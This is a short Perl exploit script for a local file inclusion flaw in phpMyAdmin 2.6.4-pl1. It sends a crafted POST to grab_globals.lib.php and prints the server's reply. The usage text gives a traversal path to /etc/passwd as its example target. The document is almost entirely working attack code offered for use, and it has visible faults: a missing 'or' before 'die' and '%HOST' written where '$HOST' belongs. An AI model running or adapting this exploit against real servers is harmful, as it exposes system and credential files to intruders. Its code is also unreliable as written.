phpMyAdmin 2.6.4-pl1 simple exploit

1. #!/usr/bin/perl
2. use IO::Socket;
3. # simple exploit phpMyAdmin 2.6.4-pl1
4.  
5. if (@ARGV < 3)
6. {
7. print "usage: perl phpmyadmin-2.6.4-pl1.pl HOST /DIR/ FILE\r\n\r\n";
8. print "HOST - Host where is phpmyadmin example: http://localhost\r\n";
9. print "DIR - Directory to PMA example: /phpMyAdmin-2.6.4-pl1/\r\n";
10. print "FILE - file to inclusion ../../../../../etc/passwd\r\n\r\n";
11. print "example: perl phpmyadmin-2.6.4-pl1.pl http://localhost /phpMyAdmin-2.6.4-pl1/ ../../../../../etc/passwd\r\n\r\n";
12. exit();
13. }
14.  
15. $HOST = $ARGV[0];
16. $DIR = $ARGV[1]."libraries/grab_globals.lib.php";
17. $FILE = "usesubform[1]=1&usesubform[2]=1&subform[1][redirect]=". $ARGV[2]. "&subform[1][cXIb8O3]=1";
18. $LENGTH = length $FILE;
19.  
20. print "\r\nATTACK HOST IS: ".$HOST."\r\n\r\n";
21. $HOST =~ s/(http:\/\/)//;
22. $get1 = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$HOST", PeerPort => "80") die "Error 404\r\n\r\n";
23. print $get1 "POST ".$DIR." HTTP/1.0\n";
24. print $get1 "Host: ".%HOST."\n";
25. print $get1 "Content-Type: application/x-www-form-urlencoded\n";
26. print $get1 "Content-Length: ".$LENGTH."\n\n";
27. print $get1 $FILE;
28.  
29. while ($odp = <$get1>)
30. {
31. if ($odp =~ /<b>Warning<\/b>: main\(\): Unable to access .\/$ARGV[2] in <b>/ ) {
32. printf "\n\nFile ".$ARGV[2]." no exists.\r\n\r\n";
33. exit;
34. }
35.  
36. printf $odp;
37. }